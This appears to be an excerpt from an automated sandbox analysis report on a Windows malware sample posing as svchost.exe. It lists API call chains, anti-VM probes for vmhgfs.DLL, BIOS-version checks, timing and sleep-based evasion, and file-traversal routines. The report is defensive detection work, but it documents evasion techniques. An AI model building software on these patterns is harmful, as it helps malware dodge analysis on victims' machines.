    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,StrStrIA,6_2_02572B40
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,6_2_02572BB0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,6_2_02551170
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,6_2_0255D970
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,6_2_02551660
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,6_2_02553610
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,6_2_0256CE10
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,6_2_02571690
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,6_2_02573F50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,6_2_02565720
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,6_2_02557FD0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,6_2_02571460
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,6_2_02573CE0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,6_2_025725C0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetUserNameA,memset,StrStrIA,6_2_0256ADE0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,8_2_025D6CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,StrStrIA,8_2_025E2B40
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,8_2_025E2BB0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,8_2_025C1170
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,8_2_025CD970
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,8_2_025C1660
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,8_2_025C3610
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,8_2_025DCE10
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,8_2_025E1690
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,8_2_025E3F50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,8_2_025D5720
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,8_2_025C7FD0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,8_2_025E1460
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,8_2_025E3CE0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,8_2_025E25C0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetUserNameA,memset,StrStrIA,8_2_025DADE0
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_00403A20 RegQueryValueEx -> SystemBiosVersion/Date0_2_00403A20
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_00403A20 RegQueryValueEx -> SystemBiosVersion/Date1_2_00403A20
    Source: C:\Users\user\Desktop\5AFlyarMds.exeEvasive API call chain: GetVolumeInformation,DecisionNodes,ExitProcessgraph_0-21221
    Source: C:\Windows\apppatch\svchost.exeEvasive API call chain: GetVolumeInformation,DecisionNodes,ExitProcessgraph_1-65407
    Source: C:\Windows\apppatch\svchost.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_1-65439
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_0-21253
    Source: C:\Windows\apppatch\svchost.exeStalling execution: Execution stalls by calling Sleepgraph_1-65458
    Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\SysWOW64\vmhgfs.DLL
    Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\vmhgfs.DLL
    Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Program Files (x86)\Windows Defender\vmhgfs.DLL
    Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\vmhgfs.DLL
    Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\SysWOW64\OpenSSH\vmhgfs.DLL
    Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\apppatch\vmhgfs.DLL
    Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\vmhgfs.DLL
    Source: C:\Users\user\Desktop\5AFlyarMds.exe File opened / queried: C:\Users\user\Desktop\vmhgfs.DLL
    Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\SysWOW64\Wbem\vmhgfs.DLL
    Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\system\vmhgfs.DLL
    Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\vmhgfs.DLL
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_00401B20 rdtsc 0_2_00401B20
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CA78A0 CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle,1_2_02CA78A0
    Source: C:\Windows\apppatch\svchost.exe Thread delayed: delay time: 922337203685477
    Source: C:\Windows\apppatch\svchost.exe Window / User API: threadDelayed 1732
    Source: C:\Windows\apppatch\svchost.exe Window / User API: threadDelayed 7548
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CA79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,VirtualQuery,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,1_2_02CA79D0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F779D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,5_2_02F779D0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_025679D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,6_2_025679D0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025D79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,8_2_025D79D0
    Source: C:\Windows\apppatch\svchost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-65523
    Source: C:\Windows\apppatch\svchost.exeAPI coverage: 9.0 %
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeAPI coverage: 2.1 %
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeAPI coverage: 2.1 %
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeAPI coverage: 2.2 %
    Source: C:\Windows\apppatch\svchost.exe TID: 7568 Thread sleep count: 1732 > 30
    Source: C:\Windows\apppatch\svchost.exe TID: 7568 Thread sleep time: -173200s >= -30000s
    Source: C:\Windows\apppatch\svchost.exe TID: 7568 Thread sleep count: 7548 > 30
    Source: C:\Windows\apppatch\svchost.exe TID: 7568 Thread sleep time: -754800s >= -30000s
    Source: C:\Windows\apppatch\svchost.exe TID: 7528 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CBDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,1_2_02CBDAE8
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CBDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,1_2_02CBDA50
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CB9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,1_2_02CB9910
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CAD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,1_2_02CAD120
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C97680 GetHandleInformation,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,1_2_02C97680
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CAE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,1_2_02CAE6B0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F8DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,5_2_02F8DAE8
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F8DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,5_2_02F8DA50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F7D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_02F7D120
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F89910 Sleep,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,5_2_02F89910
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F7E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_02F7E6B0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F67680 Sleep,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,5_2_02F67680
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0257DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,6_2_0257DA50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0257DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,6_2_0257DAE8
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02579910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,6_2_02579910
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0256D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_0256D120
